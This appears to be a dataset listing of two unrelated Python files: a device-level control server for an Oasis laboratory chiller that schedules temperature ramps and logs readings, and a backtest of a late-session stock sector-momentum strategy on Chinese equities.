    ``int((45-8)/step)`` so its ``low``/``high`` parameters were ignored;
    it now uses ``int((high-low)/step)``.  With the default arguments the
    produced sequence is identical to before.
    """
    def ramp(low = 8.0, high = 45.0, step = 1, hold_low = 4, hold_high = 6,
             wait = False, idle_temp = 8.0, start_time = time() + 10,
             time_step = 12, repeat = 1):
        # Ramp up from low to high, hold, ramp back down, hold, then park
        # at idle_temp.  ``wait`` and ``repeat`` are currently unused.
        lst = []
        n_steps = int((high - low) / step)  # was hard-coded int((45-8)/step)
        for i in range(1, n_steps):
            lst.append([start_time + time_step*i, 1, low + i*step])
        for j in range(1, n_steps):
            lst.append([start_time + time_step*i + time_step*hold_high
                        + time_step*j, 1, high - j*step])
        lst.append([start_time + time_step*i + time_step*hold_high
                    + time_step*j + time_step*hold_low, 1, idle_temp])
        return lst
    if mode == 'ramp':
        return ramp(start_time = start_time)
    return []
def execute_task(self, lst = [0,0,0]):
    """
    Execute one task triple [scheduled_time, task_id, value]: call the
    function registered for task_id in self.task_dictionary and append a
    (timestamp, result) sample to the matching circular buffer.

    NOTE(review): the mutable default argument and the attribute name
    ``act_temeprature`` (apparent typo) are preserved because other code
    may depend on them.
    """
    from numpy import zeros
    if len(lst) == 0:
        return
    scheduled_t, task_id, value = lst[0], lst[1], lst[2]
    value = self.task_dictionary[task_id][b'function'](value)
    sample = zeros((2, 1))
    sample[0, 0] = time()
    sample[1, 0] = value
    if task_id == 0:
        self.circular_buffers[b'act_temperature'].append(sample)
        self.act_temeprature = value
        debug('%r get temperature executed: T = %r' % (time(), value))
    elif task_id == 1:
        self.circular_buffers[b'cmd_temperature'].append(sample)
        self.cmd_temperature = value
        debug('%r set temperature executed: T = %r' % (time(), value))
    elif task_id == 2:
        self.circular_buffers[b'fault'].append(sample)
        self.fault = value
        debug('%r get faults executed: T = %r' % (time(), value))
def plot_circular_buffers(self, x_ext = nan, y_ext = nan):
    """
    Scatter-plot the filled portion of the actual- and commanded-
    temperature ring buffers, plus an optional external (x, y) series,
    then show the figure (blocking).
    """
    from matplotlib import pyplot as plt
    for key in (b'act_temperature', b'cmd_temperature'):
        ring = self.circular_buffers[key]
        end = ring.pointer + 1  # buffer is filled up to (and incl.) pointer
        plt.plot(ring.buffer[0, :end], ring.buffer[1, :end], 'o')
    plt.plot(x_ext, y_ext, 'o')
    plt.show()
##################################################################################################################
##################################################################################################################
###### ######
##################################################################################################################
##################################################################################################################
def init(msg_in = None, client = None):
    """
    Server command handler: tear down any existing device-level instance
    and build a fresh one, then delegate to its init().

    Bug fix: the rebuild guard tested ``'di245_dl' in globals()`` — a name
    from a different (DI-245) driver, so the stale Oasis instance was
    never deleted; it now tests ``'oasis_dl'``.  The bare ``except:`` is
    narrowed to Exception so KeyboardInterrupt/SystemExit propagate.
    """
    global oasis_dl, device_level
    try:
        driver.ser.close()
    except Exception:
        # best-effort close of the serial port; log and continue
        warn(traceback.format_exc())
    if 'oasis_dl' in globals():  # was 'di245_dl' (copy-paste bug)
        del oasis_dl, device_level
    oasis_dl = Oasis_DL()
    device_level = oasis_dl
    return oasis_dl.init()
# Module-level bootstrap: create the device-level singleton and expose it
# through a low-level command server.
oasis_dl = device_level = Oasis_DL()
from XLI.drivers.OasisChiller.serial_driver import driver
from XLI.server_LL import Server_LL
server = Server_LL()
# Candidate TCP ports for the server (selection logic lives in Server_LL).
server.init_server(name = 'OasisChiller_DL', ports = [2040,2041,2042])
###Callback function linking between incoming server commands and functions in the DL
server.commands[b'init'] = init
server.commands[b'abort'] = device_level.abort
server.commands[b'close'] = device_level.close
server.commands[b'snapshot'] = device_level.snapshot
server.commands[b'controls'] = device_level.controls
server.commands[b'indicators'] = device_level.indicators
server.commands[b'notify_subscribers'] = device_level.notify_subscribers
# NOTE(review): 'schedule' and 'get_circular_buffer' handlers are not visible
# in this part of the file — the visible method is named schedule_task_queue;
# confirm the class actually defines these attributes.
server.commands[b'schedule'] = device_level.schedule
server.commands[b'get_circular_buffer'] = device_level.get_circular_buffer
server.commands[b'subscribe'] = server.subscribe
if __name__ == "__main__": #for testing
    from tempfile import gettempdir
    import logging
    # Verbose console logging for interactive debugging sessions.
    logging.basicConfig(#filename=gettempdir()+'oasis_DL.log',
                level=logging.DEBUG, format="%(asctime)s %(levelname)s: %(message)s")
    # Alias so the methods above can be pasted into the REPL unchanged.
    self = device_level
    msg = 'Oasis Chiller is running. \n'
    msg += 'The server port %r and ip-address %r' %(server.port,server.ip_address)
    print(msg)
    # Usage hints for the interactive session:
    print('oasis_dl.init(); oasis_dl.start();')
    print('oasis_dl.playlist = oasis_dl.create_task_sequence(start_time = time()); oasis_dl.playlist_counter = 0;')
    print('oasis_dl.plot_circular_buffers()')
    print('oasis_dl.ctrls.set_cmd_temperature(7)')
    print("t1 = time(); res = oasis_dl.retrieve_values(msg_in = \
{b'buffer_name':b'act_temperature', b'time_vector': asarray([time()-10,time()-20])}, N = 2);t2 = time(); t2-t1")
    print('for i in range(len(arr)):arr[i] = time() - 100 - i*4')
    from numpy import zeros
    # Scratch array for the snippet suggested above.
    arr = zeros(10)
|
# -*- coding: utf-8 -*-
"""
# 对尾盘策略的进行回测;
# 主要的纠结点在于板块的龙头股的确定;
Tue 2018/04/02
@author: Tracy Zhu
"""
# 导入系统库
import sys
# 导入用户库
sys.path.append("..")
from stock_data_task.find_hot_block import *
from stock_base.stock_file_api import *
# Output directory for the distribution histograms (relative Windows path).
picture_out_folder = ".\\stock_backtest\\picture\\"
# Full exchange trading calendar, loaded once at import time.
trading_day_list = get_trading_day_list()
def get_select_stock_by_late_day(trading_day):
    """
    Pick candidate stocks from the day's late-session hot blocks: rank
    concept blocks by minute data, then from each of the top three blocks
    take the first (best-ranked) stock whose daily change is still below
    the 9% limit-up threshold.
    :param trading_day: e.g. '2018-03-02'
    :return: list of selected stock codes (at most 3)
    """
    picks = []
    sorted_blocks, block_stock_dict = get_hot_block_late_day(trading_day)
    for block_code, _ in sorted_blocks[:3]:
        ranked_stocks = block_stock_dict[block_code]
        for stock_code, metrics in ranked_stocks:
            # metrics[0] is the day's percentage change
            if metrics[0] < 0.09:
                picks.append(stock_code)
                break  # one stock per hot block
    return picks
def get_hot_block_late_day(trading_day):
    """
    Rank concept blocks by how much their advancing ratio improved over
    the late session (14:30 to close).
    :param trading_day: e.g. '2018-03-02'
    :return: (blocks sorted by ratio change desc, {block_code: ranked stocks})
    """
    # NOTE(review): computed but never used afterwards — confirm it can go.
    pre_trading_day = get_pre_trading_day_stock(trading_day)
    spot_time = '14:30'
    # NOTE(review): concept membership is fetched for the hard-coded date
    # '2018-03-30' instead of trading_day — confirm this is intended.
    block_code_list = find_all_stock_concept_list_ifind('2018-03-30')
    block_stock_dict = defaultdict()
    ratio_change_by_block = defaultdict()
    for block_code in block_code_list:
        concept_code = block_code.split(',')[0]
        stock_code_list = find_concept_stock_ifind(concept_code, '2018-03-30')
        positive_ratio, positive_ratio_change, ranked_stocks = \
            block_describe_find_leading_stock(stock_code_list, trading_day, spot_time)
        ratio_change_by_block[block_code] = (positive_ratio, positive_ratio_change)
        block_stock_dict[block_code] = ranked_stocks
    sorted_blocks = sorted(ratio_change_by_block.items(),
                           key=lambda item: item[1][1], reverse=True)
    return sorted_blocks, block_stock_dict
def block_describe_find_leading_stock(stock_code_list, trading_day, spot_time):
    """
    Summarise one block as of spot_time: fraction of members that are up
    at the close, its change versus the spot_time snapshot, and the top-5
    members ranked by daily percentage change.
    :param stock_code_list: member stock codes of the block
    :param trading_day: e.g. '2018-03-02'
    :param spot_time: intraday snapshot time, e.g. '14:30'
    :return: (positive_ratio, positive_ratio_change, top-5 ranked stocks)
             ratios default to -999 when no member passes the data filter
    """
    positive_ratio = -999
    positive_ratio_change = -999
    stock_metrics = defaultdict()
    valid_count = 0
    positive_num = 0
    spot_positive_num = 0
    for stock_code in stock_code_list:
        print(stock_code)
        spot_yield, percent_chg, close_price = get_stock_slice_data_by_minute_data(
            stock_code, trading_day, spot_time)
        # filter out obvious bad data (|change| >= 12% is impossible intraday)
        if -12 < percent_chg < 12:
            stock_metrics[stock_code] = (percent_chg, close_price)
            valid_count += 1
            if percent_chg > 0:
                positive_num += 1
            if spot_yield > 0:
                spot_positive_num += 1
    if valid_count > 0:
        positive_ratio = float(positive_num) / float(valid_count)
        spot_positive_ratio = float(spot_positive_num) / float(valid_count)
        positive_ratio_change = positive_ratio - spot_positive_ratio
    sorted_stock_list = sorted(stock_metrics.items(),
                               key=lambda item: item[1][0], reverse=True)[:5]
    return positive_ratio, positive_ratio_change, sorted_stock_list
def get_stock_after_trend(stock_code, trading_day):
    """
    Forward cumulative return of one stock over the 10 trading days after
    trading_day, measured against the entry close (the close of
    trading_day itself).
    :param stock_code: stock to evaluate
    :param trading_day: entry day, e.g. '2018-04-03'
    :return: pandas Series of cumulative returns
    """
    holding_days = 10
    end_date = get_next_trading_day_stock(trading_day, holding_days)
    price_df = get_stock_df(stock_code, trading_day, end_date)
    entry_close = price_df.CLOSE.values[0]
    return price_df.CLOSE / entry_close - 1
def get_block_after_trend(block_stock_code_list, trading_day):
    """
    Mean forward return of a block's leading stocks over the next 10
    trading days, in excess of the CSI 300 index return over the same
    window.
    :param block_stock_code_list: [(stock_code, metrics), ...]
    :param trading_day: entry day, e.g. '2018-04-03'
    :return: pandas Series of excess cumulative returns
    """
    holding_days = 10
    end_date = get_next_trading_day_stock(trading_day, holding_days)
    per_stock_yields = defaultdict()
    for stock_code, _metrics in block_stock_code_list:
        per_stock_yields[stock_code] = get_stock_after_trend(stock_code, trading_day)
    mean_series = DataFrame(per_stock_yields).mean(axis=1)
    index_df = get_index_data("000300.SH", trading_day, end_date)
    index_yield = index_df['pct_chg'].sum()
    # index pct_chg is in percent; convert before subtracting
    return mean_series - index_yield / 100
def get_hot_block_after_trend(trading_day):
    """
    Forward mean-return series for each of the top three hot blocks of
    trading_day.
    :param trading_day: e.g. '2018-04-03'
    :return: list of three pandas Series (one per hot block)
    """
    sorted_blocks, block_stock_dict = get_hot_block_late_day(trading_day)
    series_list = []
    for block_code, _ in sorted_blocks[:3]:
        members = block_stock_dict[block_code]
        series_list.append(get_block_after_trend(members, trading_day))
    return series_list
def yield_distribution_after_trend_plot(stock_pct_df):
    """
    Save one histogram per forward day showing the cross-sample return
    distribution, to picture_out_folder as '<title>.png'.

    Bug fix: the loop created a new figure per day and never closed it, so
    matplotlib accumulated open figures (and warns/leaks after ~20); each
    figure is now closed after saving.  The redundant ``global`` statement
    was removed (the module global is only read, never assigned).

    :param stock_pct_df: DataFrame, rows = forward days (row 0 is the
        entry day and is skipped), columns = backtest samples.
    :return: None (side effect: PNG files written)
    """
    for index in stock_pct_df.index[1:]:
        yield_distribution = stock_pct_df.loc[index]
        # drop placeholder/missing values encoded as <= -100%
        yield_distribution = yield_distribution[yield_distribution > -1]
        fig, ax = plt.subplots()
        plt.hist(yield_distribution)
        title = 'distribution of ' + str(index) + ' days'
        fig.set_size_inches(23.2, 14.0)
        plt.title(title)
        out_file_name = picture_out_folder + title + '.png'
        plt.savefig(out_file_name)
        plt.close(fig)  # fix: figures were never closed -> memory leak
if __name__ == '__main__':
    # Backtest window (inclusive); 'YYYYMMDD' strings compare correctly
    # in lexicographic order.
    start_date = '20171129'
    end_date = '20180406'
    # Forward-return series per backtest day, keyed by a running sample
    # number — one dict for each hot-block rank (1st/2nd/3rd hottest).
    block_pct_dict1 = defaultdict()
    block_pct_dict2 = defaultdict()
    block_pct_dict3 = defaultdict()
    count_num = 1
    for trade_day in trading_day_list:
        # NOTE(review): strips the last character of each calendar entry —
        # presumably a trailing newline; confirm the file format.
        trading_day = trade_day[:-1]
        if trading_day >= start_date and trading_day <= end_date:
            trading_day_str = change_trading_day_format(trading_day)
            pct_series_list = get_hot_block_after_trend(trading_day_str)
            block_pct_dict1[count_num] = pct_series_list[0]
            block_pct_dict2[count_num] = pct_series_list[1]
            block_pct_dict3[count_num] = pct_series_list[2]
            count_num += 1
    block_pct_df1 = DataFrame(block_pct_dict1)
    block_pct_df2 = DataFrame(block_pct_dict2)
    block_pct_df3 = DataFrame(block_pct_dict3)
    # Only the third-ranked block's distribution is plotted here.
    yield_distribution_after_trend_plot(block_pct_df3)
    # (earlier single-stock variant kept for reference)
    # select_code_list = get_select_stock_by_late_day(trading_day_str)
    # # for stock_code in select_code_list:
    # stock_code1 = select_code_list[0]
    # pct_series1 = get_stock_after_trend(stock_code1, trading_day_str)
    # stock_pct_dict1[count_num] = pct_series1
    # if len(select_code_list) > 1:
    #     stock_code2 = select_code_list[1]
    #     pct_series2 = get_stock_after_trend(stock_code2, trading_day_str)
    #     stock_pct_dict2[count_num] = pct_series2
    # count_num += 1
    # stock_pct_df = DataFrame(stock_pct_dict1)
    # stock_pct_df1 = DataFrame(stock_pct_dict1)
    # stock_pct_df2 = DataFrame(stock_pct_dict2)
    # yield_distribution_after_trend_plot(stock_pct_df2)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.